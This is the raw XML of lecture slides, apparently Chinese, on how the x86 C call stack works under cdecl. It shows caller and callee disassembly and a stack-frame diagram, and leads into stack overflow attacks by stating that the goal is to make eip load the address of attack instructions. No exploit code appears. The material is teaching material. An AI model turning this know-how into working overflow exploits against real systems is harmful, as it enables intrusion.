            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="Shape 538"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Shape 539"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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541" name="Shape 541"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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542" name="Shape 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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543" name="Shape 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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544" name="Shape 544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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545" name="Shape 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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546" name="Shape 546"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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547" name="Shape 547"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="548" name="Shape 548"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="4134381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="549" name="Shape 549"/>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kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="550" name="Shape 550"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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551" name="Shape 551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4028133"/>
            <a:ext cx="1785600" cy="4096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333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   %ebp, $esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="552" name="Shape 552"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="551" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988867" y="4129733"/>
            <a:ext cx="745600" cy="103200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Shape 553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4134367"/>
            <a:ext cx="100800" cy="2540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554" name="Shape 554"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="1822941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="555" name="Shape 555"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="11262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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="556" name="Shape 556"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>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557" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1570533"/>
            <a:ext cx="27048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ret addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F49922-A61B-4DC7-9E28-4A190D888FD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C54D8C-C55A-4C11-B98A-C553977D567D}"/>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3" name="Shape 563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="2256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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>00000000 &lt;callee&gt;:</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0:   55          push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   89 e5       mov    %esp,%ebp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3:   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax</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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Shape 564"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>00000012 &lt;caller&gt;:</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12:   55              push   %ebp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13:   89 e5           mov    %esp,%ebp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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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30:   c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  31:   c3              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Shape 565"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Shape 566"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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568" name="Shape 568"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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569" name="Shape 569"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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666666"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Shape 570"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="40281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571" name="Shape 571"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="44377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572" name="Shape 572"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="27048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573" name="Shape 573"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Shape 574"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="575" name="Shape 575"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="1416541"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="576" name="Shape 576"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="11262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333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="577" name="Shape 577"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>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578" name="Shape 578"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1570533"/>
            <a:ext cx="27048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ret addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35292D8-3CE1-45B7-96A3-6577ECBD739D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09065A2A-A88A-46B6-A251-128E1A8BD73C}"/>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C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语言函数调用栈</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D896494-AAE6-44DA-9D7C-E5B3B4201BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588135" y="1540331"/>
            <a:ext cx="6096000" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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介绍完背景知识，就可以继续回归栈溢出攻击的主题了。当函数正在执行内部指令的过程中我们无法拿到程序的控制权，只有在发生函数调用或者结束函数调用时，程序的控制权会在函数状态之间发生跳转，这时才可以通过修改函数状态来实现攻击。而控制程序执行指令最关键的寄存器就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，所以我们的目标就是让 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>载入攻击指令的地址。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>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solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>先来看看函数调用结束时，如果要让 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
